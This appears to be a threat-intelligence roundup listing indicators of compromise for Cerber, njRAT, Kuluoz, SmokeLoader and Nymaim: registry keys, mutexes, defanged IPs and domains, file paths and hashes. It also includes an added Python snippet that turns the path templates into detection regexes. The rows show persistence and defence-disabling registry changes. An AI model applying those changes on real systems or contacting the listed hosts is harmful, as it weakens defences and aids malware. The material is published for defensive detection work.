vyohacxzoue32vvk[.]7jrv53[.]bid1
vyohacxzoue32vvk[.]jtdcph[.]bid1
vyohacxzoue32vvk[.]lpnef4[.]bid1
vyohacxzoue32vvk[.]patchmans[.]gdn1
vyohacxzoue32vvk[.]8g1k17[.]bid1
vyohacxzoue32vvk[.]goodslet[.]win1
vyohacxzoue32vvk[.]23fvxw[.]bid1
Files and or directories createdOccurrences
%TEMP%\d19ab989\4710.tmp25
%TEMP%\d19ab989\a35f.tmp25
\MSOCache\All Users\{90140000-0016-0409-0000-0000000FF1CE}-C\README.hta20
%ProgramFiles(x86)%\Microsoft Office\Templates\1033\ONENOTE\14\Stationery\README.hta20
%APPDATA%\Microsoft\Access\README.hta20
%APPDATA%\Microsoft\Outlook\README.hta20
%HOMEPATH%\Desktop\README.hta20
%HOMEPATH%\Documents\Outlook Files\README.hta20
%HOMEPATH%\Contacts\README.hta19
%TEMP%\tmp<random, matching [A-F0-9]{1,4}>.bmp19
%APPDATA%\Adobe\Acrobat\9.0\README.hta16
<dir>\<random, matching [A-Z0-9\-]{10}.[A-F0-9]{4}> (copy)10

File Hashes

000315b74577c50c57b6572c33312f1911d3d55df50674a87ee95d88a3c0b1b2 011b56e8a271ce8853e3f3e61079c2f62ceab0424a2995fdb3c3f165d2e48666 016aecdd057f2a3881726fde3b86d252062b8891d37822b0dd48ba62ee258dbf 01a0d960c7d6cae948631473f5b39c85b490c83a362d1eeb5f36a5908127389f 040587bdd329f4db15db6f24162691421069e38324b38275449db69ac2cf2029 0430c8f48d38780eba6e1d1b31a80b9c27f3c2bc5507cee74f352546ef07fe7a 0458432198b913f1bf1180e489186297d510550ce908e1dae163a7163a7ade3f 04b76f05a328d0c650141e82da5dbecb4b8d6f0c9c1c7ad83fd111c1f915a0cc 08561dd16308a0871e531a56e834ef0feeafff902901ef7114f5901ee68735db 09172c06a88ed355a772a24f06657e126809dbd61d4b1dda3ad274fb6c7b28fa 0d6c99690789fb5c3a8f8e9f384a34e9da251533910e89df6fcd9098c5edc042 0d909f449bc71cf5ff20077c20215f0b0b358b9f7c1f6baea8fd0592e376248f 0e2aa56da62c5a9bddef4a0162ad5522b0530d2470a0aa9c39ef2c781c0f3672 0fc0d6c7c8b0661db73de058f1f30432d4fef0670dcf5a2f9416f7e2c723cfd1 0fea5d0606a587c7bfb985fbd896ac6cb4fcd6663538a8a5d1760a3171380834 1025c58e7ffef3535b7fb89a900ee09cfecfd11af644f0f5155a832dafd9a02c 1142746bc626e5ee64430de62de2b1383f193d84f4b7044ab67236c427600099 1658371db7a7e52a191522322cda7fe93d093b54e2e8cba65a5adae91a3f5bf1 17ff4c8f632ca8e4a9200e9a68f46a6d3440cac2dd7c8c4e8e1698291e8c7cd1 18192e9bffb8e02b8a3c7540f0d33d14d0f49464adaec86d86f5477a55694eb0 19f56bfaf4437ae7fc227ad695d16adc7d94a91ebf092cbac0e406e421d7c48a 1a1378b871bb6d0a00fe3c6e151d5510f28d92b00ed87031916247b91e13a216 1b7962b03eb0e7fb25f9f31d20d263e3ef6603623f8e0efc94a91a00f9b1b3f1 1bf19b2a823abd555002380c9fc5fc932c2e66826d1c949ac96050d51924ab41 1c018281e339f735fde9edb9180f3f08181f34226aefd3d43d8de6874bdd77c4
*See JSON for more IOCs

Coverage

Product | Protection
AMP | This has coverage
Cloudlock | N/A
CWS | This has coverage
Email Security | This has coverage
Network Security | This has coverage
Stealthwatch | N/A
Stealthwatch Cloud | N/A
Threat Grid | This has coverage
Umbrella | N/A
WSA | This has coverage

Screenshots of Detection (images not reproduced here): AMP, ThreatGrid
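The file indicators in the Cerber table above are written as path templates: environment placeholders such as %TEMP% and %HOMEPATH%, and generated-name placeholders such as <random, matching [A-F0-9]{1,4}>, whose bracketed part reads as a regular expression. To hunt with them against endpoint telemetry the templates have to be turned into matchers. The Python below is an added example, not Talos tooling and not part of the roundup: it compiles a subset of the Cerber templates (copied verbatim) into regular expressions and runs them over constructed file-creation events. The environment-variable expansions in ENV_PATTERNS, the sample paths in FILE_EVENTS and the refang helper are all assumptions for illustration.

```python
import re

# Subset of the Cerber "Files and/or directories created" indicators, copied as written.
CERBER_FILE_IOCS = [
    r"%TEMP%\d19ab989\4710.tmp",
    r"%HOMEPATH%\Desktop\README.hta",
    r"%TEMP%\tmp<random, matching [A-F0-9]{1,4}>.bmp",
    r"<dir>\<random, matching [A-Z0-9\-]{10}.[A-F0-9]{4}> (copy)",
]

# Assumed expansions of the placeholders for a default Windows profile layout.
# Each value is a regex fragment; any user name is accepted where a profile path appears.
ENV_PATTERNS = {
    "%TEMP%": r"C:\\Users\\[^\\]+\\AppData\\Local\\Temp",
    "%APPDATA%": r"C:\\Users\\[^\\]+\\AppData\\Roaming",
    "%LOCALAPPDATA%": r"C:\\Users\\[^\\]+\\AppData\\Local",
    "%HOMEPATH%": r"C:\\Users\\[^\\]+",
    "%ProgramData%": r"C:\\ProgramData",
    "%ProgramFiles(x86)%": r"C:\\Program Files \(x86\)",
    "<dir>": r"[A-Za-z]:\\(?:[^\\]+\\)*[^\\]+",   # any directory on any drive
}

# One token is either an %ENV% placeholder, the <dir> placeholder, or a
# <random, matching REGEX> placeholder (optionally quoted, as some Talos rows are).
TOKEN = re.compile(r"(%[A-Za-z0-9()]+%|<dir>|<random, matching '?(.+?)'?>)")


def template_to_regex(template: str) -> "re.Pattern[str]":
    """Compile a Talos-style path template into an anchored, case-insensitive regex.

    Literal text between placeholders is escaped; the inner regex of a
    <random, matching ...> placeholder is used as-is.
    """
    parts, pos = [], 0
    for m in TOKEN.finditer(template):
        parts.append(re.escape(template[pos:m.start()]))
        token, inner = m.group(1), m.group(2)
        if inner is not None:
            parts.append(f"(?:{inner})")
        elif token in ENV_PATTERNS:
            parts.append(ENV_PATTERNS[token])
        else:
            raise ValueError(f"unknown placeholder {token!r} in {template!r}")
        pos = m.end()
    parts.append(re.escape(template[pos:]))
    # NTFS paths are case-insensitive, so match that way.
    return re.compile("^" + "".join(parts) + "$", re.IGNORECASE)


def match_events(templates, paths):
    """Return (path, template) pairs for every path that matches some template."""
    compiled = [(t, template_to_regex(t)) for t in templates]
    hits = []
    for path in paths:
        for template, rx in compiled:
            if rx.match(path):
                hits.append((path, template))
                break
    return hits


def refang(indicator: str) -> str:
    """Turn the defanged 'a[.]b' notation used in the tables back into a real name."""
    return indicator.replace("[.]", ".")


# Constructed file-creation events (e.g. the TargetFilename of a Sysmon Event ID 11).
FILE_EVENTS = [
    r"C:\Users\alice\AppData\Local\Temp\d19ab989\4710.tmp",      # exact indicator
    r"C:\Users\alice\AppData\Local\Temp\tmpA3F.bmp",             # random hex name
    r"C:\Users\alice\Desktop\README.hta",                        # ransom note
    r"C:\Users\alice\Documents\QX7-PL2KM9.1F0B (copy)",          # encrypted-file pattern
    r"C:\Users\alice\AppData\Local\Temp\tmpreport.bmp",          # benign: not hex
    r"C:\Windows\System32\drivers\etc\hosts",                    # benign
]

if __name__ == "__main__":
    for path, template in match_events(CERBER_FILE_IOCS, FILE_EVENTS):
        print(f"HIT  {path}\n     matched {template}")
```

The anchored regex is deliberate: an unanchored search would let a short template such as `%TEMP%\tmp<...>.bmp` fire on any deeper path that happens to contain that substring. As the roundup notes, a hit on a single indicator is a lead for investigation, not proof of compromise; a README.hta on a desktop deserves a look at the process that wrote it before anyone declares a Cerber infection.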





Win.Packed.njRAT-7561028-1

Indicators of Compromise

Registry Keys | Occurrences
<HKCU>\ENVIRONMENT, Value Name: SEE_MASK_NOZONECHECKS | 15
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\WINLOGON, Value Name: ParseAutoexec | 15
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN, Value Name: 5cd8f17f4086744065eb0992a09e05a2 | 3
<HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN, Value Name: 5cd8f17f4086744065eb0992a09e05a2 | 3
<HKCU>\SOFTWARE\C2405709A54EC95CDDCC5C598F34081C | 3
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN, Value Name: c2405709a54ec95cddcc5c598f34081c | 3
<HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN, Value Name: c2405709a54ec95cddcc5c598f34081c | 3
<HKCU>\SOFTWARE\C2405709A54EC95CDDCC5C598F34081C, Value Name: [kl] | 3
<HKCU>\SOFTWARE\61EA4210CF20153E16C66B613536B9E0 | 2
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN, Value Name: 61ea4210cf20153e16c66b613536b9e0 | 2
<HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN, Value Name: 61ea4210cf20153e16c66b613536b9e0 | 2
<HKCU>\SOFTWARE\61EA4210CF20153E16C66B613536B9E0, Value Name: [kl] | 2
<HKCU>\SOFTWARE\C550D26EE8BEBB2D926652BE861588B2 | 2
<HKCU>\SOFTWARE\C550D26EE8BEBB2D926652BE861588B2, Value Name: hp | 2
<HKCU>\SOFTWARE\C550D26EE8BEBB2D926652BE861588B2, Value Name: i | 2
<HKCU>\SOFTWARE\C550D26EE8BEBB2D926652BE861588B2, Value Name: kl | 2
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN, Value Name: c550d26ee8bebb2d926652be861588b2 | 2
<HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN, Value Name: c550d26ee8bebb2d926652be861588b2 | 2
<HKCU>\SOFTWARE\ADOBE\ACROBAT READER\9.0\AVGENERAL, Value Name: bLastExitNormal | 1
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN, Value Name: f8782a013a20610e09216f21b705d856 | 1
<HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN, Value Name: f8782a013a20610e09216f21b705d856 | 1
<HKCU>\SOFTWARE\F8782A013A20610E09216F21B705D856, Value Name: [kl] | 1
<HKCR>\LOCAL SETTINGS\SOFTWARE\MICROSOFT\WINDOWS\SHELL\MUICACHE, Value Name: C:\Program Files (x86)\Windows Photo Viewer\PhotoViewer.dll | 1
<HKCR>\LOCAL SETTINGS\SOFTWARE\MICROSOFT\WINDOWS\SHELL\MUICACHE, Value Name: C:\Program Files (x86)\Windows NT\Accessories\WORDPAD.EXE | 1
<HKCU>\SOFTWARE\A283D5EDA9CD874157ADF0AF127AFD04, Value Name: hp | 1

Mutexes | Occurrences
<32 random hex characters> | 11
5cd8f17f4086744065eb0992a09e05a2 | 3
c550d26ee8bebb2d926652be861588b2SGFjS2Vk | 2
Acrobat Instance Mutex | 1
a283d5eda9cd874157adf0af127afd04SGFjS2Vk | 1
2AC1A572DB6944B0A65C38C4140AF2F44d472337468 | 1
2AC1A572DB6944B0A65C38C4140AF2F44d472337490 | 1
2AC1A572DB6944B0A65C38C4140AF2F44d4723374A4 | 1
2AC1A572DB6944B0A65C38C4140AF2F44d4723374CC | 1
2AC1A572DB6944B0A65C38C4140AF2F44d47233758C | 1
2AC1A572DB6944B0A65C38C4140AF2F44d4723376DC | 1
2AC1A572DB6944B0A65C38C4140AF2F44d472337710 | 1
2AC1A572DB6944B0A65C38C4140AF2F44d472337750 | 1
2AC1A572DB6944B0A65C38C4140AF2F44d472337828 | 1
2AC1A572DB6944B0A65C38C4140AF2F44d4723378B0 | 1
2AC1A572DB6944B0A65C38C4140AF2F44d473EA6134 | 1

IP Addresses contacted by malware. Does not indicate maliciousness | Occurrences
156[.]216[.]33[.]12 | 1
141[.]255[.]152[.]56 | 1
141[.]255[.]153[.]212 | 1

Domain Names contacted by malware. Does not indicate maliciousness | Occurrences
imaneblueyes[.]ddns[.]net | 2
mestry1212[.]ddns[.]net | 2
amrfarag[.]ddns[.]net | 1
njs1[.]ddns[.]net | 1
emlpesa[.]ddns[.]net | 1
facebock[.]ddns[.]net | 1

Files and/or directories created | Occurrences
%TEMP%\server.exe | 4
%TEMP%\Trojan.exe | 3
%TEMP%\Trojan.exe.tmp | 3
%APPDATA%\Microsoft\Windows\Start Menu\Programs\Startup\c2405709a54ec95cddcc5c598f34081c.exe | 3
%TEMP%\Chrom.exe | 3
%APPDATA%\Microsoft\Windows\Start Menu\Programs\Startup\c550d26ee8bebb2d926652be861588b2.exe | 2
%APPDATA%\Adobe\Acrobat\9.0\AdobeCMapFnt09.lst | 1
%APPDATA%\Adobe\Acrobat\9.0\SharedDataEvents | 1
%APPDATA%\Adobe\Acrobat\9.0\UserCache.bin | 1
%LOCALAPPDATA%\Adobe\Acrobat\9.0\Cache\AcroFnt09.lst | 1
%APPDATA%\Adobe\Acrobat\9.0\SharedDataEvents-journal | 1
%APPDATA%\Microsoft.exe | 1
%TEMP%\Windows | 1
%TEMP%\Windows Update.exe | 1
%APPDATA%\Microsoft\Windows\Start Menu\Programs\Startup\f8782a013a20610e09216f21b705d856.exe | 1
%APPDATA%\Microsoft\Windows\Start Menu\Programs\Startup\9de3566e57ab5f0665456e9f5754a7d3.exe | 1
%APPDATA%\Microsoft\Windows\Start Menu\Programs\Startup\2f08ade869f075aa32331d77d03e57e5.exe | 1
%APPDATA%\Microsoft\Windows\Start Menu\Programs\Startup\77ca5176ec9da801e6934f1f927759d5.exe | 1

File Hashes

186dae58f108dac74fd244a34d8a508232ae314301992e52a166c2e6f82e50e3 28fa81e67c51b9ba0c71dde4b5ad4df0d3314f81deef202492be2d85a4af6c05 3335c86b6906fc3f0fc3ada7dec5fde0c10be9e8b0c20f9fe8719f2c54ff277b 41d83b4ddf1b6861b2f7b5f3fd949f208cd0bdd96966217c61b5d5ea45c3a1c4 488864edfd3a995a2733f842bdf18cdf638b1f03563fc1959da6b04c719f09d9 6e25e2b859bf13299c0c116bf94bd86ea97c470aada3fa94bc2a4522ca1a471b 70b10d403f814d4bc94e0fdaf9584563d47bb36d72a1afce40cfd0ebec1eafd9 7274ef9fd2c4bab07a9a3ca46fb0f4b37107748fb9d8632e27faeba6be597b46 77149e99944db0ebe0c44bee046dad27529a104c6b9214973fba67f707bb3566 7cf3348c2711766f5ef2222a3cc74033fa08577a023f4e69fd921acc50810fa8 a0e50a68677941f3b7e68f9d32e4d1e014dac945a2e01f6bb823e58adeb7ec09 aa74ffa3991bf176f7d9eca8da00f379f735bd2d3acd7e9dd74fc041bbf84d01 c10cfd2c2141fa2d49f0d6f1238e844b51ed3381f6c63fed03792ec90a198fce c1938290fa67d53419918fec56e9f2ee07627fd0f8c279fa7f13357c624041e7 e3b41f2a9223a9531b94c257cba97ecd5b075a04523e5f19c9bb07396097a99a f0d1321a4f4774b87d74b8d5a18be28d3dae01361f0d28be599e7bb955a140f8 fc6b24794dd8168be2adc39d831cd18ea43f7cd9e91942228df5fc70606c509e

Coverage

Product | Protection
AMP | This has coverage
Cloudlock | N/A
CWS | This has coverage
Email Security | This has coverage
Network Security | This has coverage
Stealthwatch | N/A
Stealthwatch Cloud | N/A
Threat Grid | This has coverage
Umbrella | N/A
WSA | This has coverage

Screenshots of Detection (images not reproduced here): AMP, ThreatGrid




Win.Packed.Kuluoz-7561668-1

Indicators of Compromise

Mutexes | Occurrences
2GVWNQJz1 | 25

IP Addresses contacted by malware. Does not indicate maliciousness | Occurrences
69[.]93[.]231[.]252 | 18
149[.]154[.]154[.]249 | 18
88[.]190[.]226[.]223 | 17
31[.]47[.]250[.]41 | 16
83[.]141[.]7[.]102 | 12
50[.]56[.]124[.]35 | 10

Files and/or directories created | Occurrences
%LOCALAPPDATA%\<random, matching '[a-z]{8}'>.exe | 25
%HOMEPATH%\Local Settings\Application Data\tffgswtx.exe | 3
%HOMEPATH%\Local Settings\Application Data\uhqbtmne.exe | 1
%HOMEPATH%\Local Settings\Application Data\tmdejqpr.exe | 1
%HOMEPATH%\Local Settings\Application Data\gesansxj.exe | 1
%HOMEPATH%\Local Settings\Application Data\xfddgijv.exe | 1
%HOMEPATH%\Local Settings\Application Data\sqslklnf.exe | 1
%HOMEPATH%\Local Settings\Application Data\krkswwef.exe | 1
%HOMEPATH%\Local Settings\Application Data\blvvvbjt.exe | 1
%HOMEPATH%\Local Settings\Application Data\uswhecuu.exe | 1
%HOMEPATH%\Local Settings\Application Data\stterjid.exe | 1
%HOMEPATH%\Local Settings\Application Data\xuxivago.exe | 1
%HOMEPATH%\Local Settings\Application Data\vhhvooxa.exe | 1
%HOMEPATH%\Local Settings\Application Data\tqknmmob.exe | 1
%HOMEPATH%\Local Settings\Application Data\pnitjnpg.exe | 1
%HOMEPATH%\Local Settings\Application Data\tjucsrwv.exe | 1
%HOMEPATH%\Local Settings\Application Data\fidbhpbb.exe | 1
%HOMEPATH%\Local Settings\Application Data\qpuokdjt.exe | 1
%HOMEPATH%\Local Settings\Application Data\mpwshjgw.exe | 1
%HOMEPATH%\Local Settings\Application Data\uhpeqlrs.exe | 1
%HOMEPATH%\Local Settings\Application Data\elsmwsrf.exe | 1
%HOMEPATH%\Local Settings\Application Data\kwfdmcme.exe | 1
%HOMEPATH%\Local Settings\Application Data\egcnjpnc.exe | 1
%HOMEPATH%\Local Settings\Application Data\ntftgptb.exe | 1

File Hashes

0108740d41c4f9f055e365a2f69b297ce9c10c8bb1ba0de30bbf5d65dcb60c2c 012082d16c60291c94e03aad79d7363ee6500ddd1e775487960565977d3c87b9 02fba64a3b71a5ac96e3d827c8d38cce63a252d2e3569adbfef99910cdfadc51 0527a40a7d8fff9c7fcd999e746f484156c66714d2fbcce5fd3215de4ec89f05 0549b4e372310c856e724a3afc638e4e94b4faaf5d947dc7e517e6f84eff312f 060620d8e4038d2705cf20ae625a8b5eb23e4888b51ad0f7cbd7adf68d7deef2 061f8f8125741ed3271cd34d2b7a58bb92affbd4d652e332f5c8c26ee55883ee 06288e899058ab5d7773b7353f66565545a8feba7380b121d80112bbe0453d30 0696d337aa0b00ca9a22cd1f934fc7ea7cb4591073dc97bbc90263d9dcb5b232 078c9cfcab1871f10a2f8168a18f40dd5c90d7900f82ba73c16bd2425fee430e 093285215d738a1b2f5e66ace61ff34e561b3a941e664b1e2c583bc9392b57e8 09b48bfc7ad57b3d7924ed422defdfc9218c3c2b592e56b5c25a9faf1058d716 0a0e1e0ba5bc50ae1b4d83c4993c79abc783a3962f101516ef7c046d5d261697 0a9a6045b22468d1f35fe939f00318f841b26ebc4491d77e90c4d861902987ff 0b13ffc85de1b3e09f9850d010c85e64b4daa77f6acbfdf334b9126726fcf81f 0b516d370bd6e32d4e1f34c9119dbcd85ed302ff13abeb2433ac0c8fc97fb874 0ba092f829fa1a6d4a407c80b3032ae15b55a6a2bc4881e23fe1b2087d55bfd0 0c1b0a0154c6f83a96a949e26f42086af5bfaf2ad7c6cda273ae8d72c6412373 0c3a114fa273a56b3298ac93d7ee8358dcf6f16948b6ed7deaacec4eaef51860 0c4ae1b251bfed96d1e8eea56d618d35a56a6a0fe33ca76da299ed6232bf10da 0c88e57f1814b0bf3c5cd6520c368f4d7b3332614493d6fe87c280f6719ff6a3 0d6e734a8f3144b5fb657501546386535b86baec473f299857241a3b302cd320 0de30c8bd2a81c1a88cf936c811d36be0680c206d93a176351bb9bd92da48c7b 0e2d908f734e728e9cd08d696533004abf1723991541f687fa540352ef032c35 0ff08927fc2e34a84b9ce4cedb70a728b30c2babfd7aeeedd35769f1f0aeb6b3
*See JSON for more IOCs

Coverage

Product | Protection
AMP | This has coverage
Cloudlock | N/A
CWS | This has coverage
Email Security | This has coverage
Network Security | N/A
Stealthwatch | N/A
Stealthwatch Cloud | N/A
Threat Grid | This has coverage
Umbrella | N/A
WSA | N/A

Screenshots of Detection (images not reproduced here): AMP, ThreatGrid




Win.Trojan.SmokeLoader-7562031-1

Indicators of Compromise

Registry Keys | Occurrences
<HKCU>\SOFTWARE\LOCAL APPWIZARD-GENERATED APPLICATIONS | 22
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\POLICIES\EXPLORER\RUN | 8
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\EXPLORER\ADVANCED, Value Name: Hidden | 7
<HKLM>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\POLICIES\SYSTEM, Value Name: EnableLUA | 7
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\WSCSVC, Value Name: Start | 7
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\WINDEFEND, Value Name: Start | 7
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\EXPLORER\ADVANCED, Value Name: ShowSuperHidden | 7
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\SHAREDACCESS, Value Name: Start | 7
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\MPSSVC, Value Name: Start | 7
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\WUAUSERV, Value Name: Start | 7
<HKLM>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\POLICIES\EXPLORER, Value Name: TaskbarNoNotification | 7
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\POLICIES\EXPLORER, Value Name: TaskbarNoNotification | 7
<HKLM>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\POLICIES\EXPLORER, Value Name: HideSCAHealth | 7
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\POLICIES\EXPLORER, Value Name: HideSCAHealth | 7
<HKLM>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\POLICIES\EXPLORER\RUN | 7
<HKLM>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\POLICIES\EXPLORER\RUN, Value Name: 2827271685 | 7
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN, Value Name: 2827271685 | 5
<HKCU>\SOFTWARE\WINRAR | 2
<HKLM>\SAM\SAM\DOMAINS\ACCOUNT\USERS\000003E9, Value Name: F | 2
<HKLM>\SAM\SAM\DOMAINS\ACCOUNT\USERS\000001F5, Value Name: F | 2
<HKCU>\SOFTWARE\WINRAR, Value Name: HWID | 2
<HKLM>\SAM\SAM\DOMAINS\ACCOUNT\USERS\000003EC, Value Name: F | 2
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN, Value Name: Service Host Process for Windows | 1
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN, Value Name: help | 1
<HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN, Value Name: help | 1

Mutexes | Occurrences
qazwsxedc | 16
04F453E614B75F818C01D1BD88F5825B98B68E3C | 7
Frz_State | 5
Local\https://docs.microsoft.com/ | 1
YAHWKKS65HAKSDJA | 1
Mutex_Y1vFO98bB6v9Q8lC815ehD1xoEvADrFwNqccccSHudZP31Qt | 1
Mutex_nLoOSZQIZqWgQsQHTpJ1ymgM69XnbNuwA89bPTRycpnppKwx | 1
2BC133F114B75F818C01D1BDA7C0E24C98B68E3C | 1
2CA90D003CEA016700C2B1832C6BBC833C28B0E4 | 1
AA2A0D04BA6901638641B1872C6BBC833C28B0E4 | 1
A1356D9DB17661FA8D5ED11E2C6BBC833C28B0E4 | 1
7B0110536B421C34576AACD02C6BBC833C28B0E4 | 1
B3CC54B3A38F58D49FA7E8302C6BBC833C28B0E4 | 1
F99113FAE9D21F9DD5FAAF792C6BBC833C28B0E4 | 1
0527C9131564C574294C75902C6BBC833C28B0E4 | 1
12C5B9C22DB3D5B2119B6556035EDC943C28B0E4 | 1

IP Addresses contacted by malware. Does not indicate maliciousness | Occurrences
204[.]79[.]197[.]203 | 8
23[.]193[.]177[.]127 | 8
23[.]66[.]61[.]153 | 8
40[.]91[.]124[.]111 | 7
40[.]90[.]247[.]210 | 7
23[.]6[.]69[.]99 | 7
20[.]45[.]1[.]107 | 5
23[.]0[.]48[.]75 | 5
23[.]13[.]211[.]142 | 4
23[.]218[.]40[.]161 | 3
13[.]107[.]21[.]200 | 2
36[.]38[.]34[.]230 | 2
40[.]112[.]72[.]205 | 2
172[.]217[.]12[.]238 | 2
104[.]102[.]89[.]231 | 2
212[.]27[.]63[.]115 | 2
23[.]0[.]209[.]167 | 2
23[.]221[.]48[.]201 | 2
207[.]148[.]248[.]143 | 1
204[.]79[.]197[.]200 | 1
184[.]105[.]192[.]2 | 1
172[.]217[.]12[.]142 | 1
172[.]217[.]197[.]156 | 1
23[.]20[.]239[.]12 | 1
40[.]76[.]4[.]15 | 1
*See JSON for more IOCs

Domain Names contacted by malware. Does not indicate maliciousness | Occurrences
m[.]googlex[.]me | 15
w[.]googlex[.]me | 15
outlook[.]com | 8
rover[.]ebay[.]com | 8
www[.]onenote[.]com | 8
www[.]msn[.]com | 8
java[.]com | 8
itunes[.]apple[.]com | 8
contextual[.]media[.]net | 8
img-s-msn-com[.]akamaized[.]net | 8
www[.]autotrader[.]com | 8
g[.]msn[.]com | 8
flights[.]msn[.]com | 8
linkmaker[.]itunes[.]apple[.]com | 8
www[.]comparecards[.]com | 8
carrentals[.]msn[.]com | 8
blog[.]msn[.]com | 8
static-global-s-msn-com[.]akamaized[.]net | 8
www[.]skype[.]com | 8
www[.]adobe[.]com | 8
www[.]fool[.]com | 8
www[.]nextadvisor[.]com | 8
e7933[.]dsca[.]akamaiedge[.]net | 8
widgets[.]tree[.]com | 8
redirect[.]viglink[.]com | 8
*See JSON for more IOCs

Files and/or directories created | Occurrences
%APPDATA%\aewefdvg | 7
%APPDATA%\aewefdvg\jisgivdt.exe | 7
%ProgramData%\Media Center Programs | 2
%APPDATA%\csrss.exe | 1
%APPDATA%\svchost.exe | 1
%APPDATA%\InstallDir | 1
%APPDATA%\InstallDir\help.exe | 1
%APPDATA%\rundll32.exe | 1
%APPDATA%\Other.res | 1
%APPDATA%\cstbddwb | 1
%APPDATA%\cstbddwb\jisgivdt.exe | 1
%TEMP%\1539673208.bat | 1
%TEMP%\1539674363.bat | 1
%APPDATA%\ctrjauaa\dtcisave.exe | 1
%TEMP%\52781.bat | 1
%APPDATA%\rrcrauae\dtcisave.exe | 1
%APPDATA%\rbdfguju\dtcisave.exe | 1
%APPDATA%\hsabbafd\dtcisave.exe | 1
%APPDATA%\sdttfesd\dtcisave.exe | 1
%TEMP%\307718.bat | 1
%APPDATA%\wjjbbdwr\dtcisave.exe | 1
%APPDATA%\afchtjbd\dtcisave.exe | 1
%APPDATA%\bctfsjtc\dtcisave.exe | 1

File Hashes

09c2143145ee9c113455c149c6ff6f951a2fd67638becc0c21bdb9c1a93e5bc3 1c6068227c934bd7eafa19513c90f83c6e84291689c529efdff52d3bbaee71ad 204fb306993b6547b953c6792d3f5e1c7c24ed1e70c40d0744f5c23d5ecc6260 2121cfce691f58d55a6865d9b0fbadfb37b1cc1b7f50e13914fc8c36d6df7a52 232c60a2fe47c6441527e0f708a695bad64770c4788d65d849895618b37ac537 2fd8a99f2e9d9940779d65f0271bedefccdea87cf9bfee5d456cdba538cd8701 322a2d80f46734cb2605d9eb0d8e7e3e100e36aced1e93302c5ce3151fffc728 34a56d4e0a80a296cfa11f929536f3d2d2ce576e28d1460259b3a2ae72c92a55 3858b2a58127adff7565ba59d9622cb82c27d7b60bb7338a35d7f9396bbb20b1 3c9dab4a204a151e2658a66e948a71790e876c657f48fd449cc57ecd79b50a77 4a461c876e41c8f10b8c682311650f535d607089e3aa930aecfcf7d0400bfb18 6854eeaf50e91cfd239713b8532ada3670c4007d30db92f7a10dcaf3919ad122 7baa48ce1d5b0783fe77a8236301991ebad8cbbfb2726d72ee7baf830be1bfac 9adc55c4337148fa4e463ef6bf008f2423dcf9a17eb0d5dcd245aa932dadd9f5 a6140aa4b277141779e6344174f88e6901e8c2921d49624f4d8a2419afa5cf93 aa6dea172c9db744c31a322163e6ec829517400a8f2af996dda345e9ab5097b8 b97f5e3d1a881e93633bcf38414d63916ba1dde8c5368d34a16aecdd227f16f1 c8a0dae1be189ebb115341551175322f8544c1a169573b43ac015b36ef2bf711 caab2cd143d3ad7e0890b3fe5a561b5a264c089186bf41ee213b1e4a32eedee4 d3cda596ba6945b34c331271ad243e81858a5614713143b04c18d1dea325e0f5 fc10ad68ba5fa127c089389f1acacb6635ae64df1525ec87dad928d7c6ac60b7 fee972c5f99500d1ac8e83ad65484494772885e18721c02f95e256c30f3f8bd2

Coverage

Product | Protection
AMP | This has coverage
Cloudlock | N/A
CWS | This has coverage
Email Security | This has coverage
Network Security | This has coverage
Stealthwatch | N/A
Stealthwatch Cloud | N/A
Threat Grid | This has coverage
Umbrella | This has coverage
WSA | This has coverage

Screenshots of Detection (images not reproduced here): AMP, ThreatGrid, Umbrella




Win.Malware.Nymaim-7565328-1

Indicators of Compromise

Registry Keys | Occurrences
<HKCU>\SOFTWARE\MICROSOFT\GOCFK | 12
<HKCU>\SOFTWARE\MICROSOFT\KPQL | 12
<HKCU>\SOFTWARE\MICROSOFT\GOCFK, Value Name: mbijg | 12
<HKCU>\SOFTWARE\MICROSOFT\KPQL, Value Name: efp | 12

Mutexes | Occurrences
Local\{06258131-BA39-27D4-02A0-AD682205B627} | 12
Local\{2D6DB911-C222-9814-3135-344B99BBA4BA} | 12
Local\{369514D7-C789-5986-2D19-AB81D1DD3BA1} | 12
Local\{D0BDC0D1-57A4-C2CF-6C93-0085B58FFA2A} | 12
Local\{D8E7AB94-6F65-71DE-8DA1-FE621BE2E606} | 12
Local\{F04311D2-A565-19AE-AB73-281BA7FE97B5} | 12
Local\{F6F578C7-92FE-B7B1-40CF-049F3710A368} | 12
Local\{338F4080-2AF8-328F-1D44-E65FAFBB3088} | 12
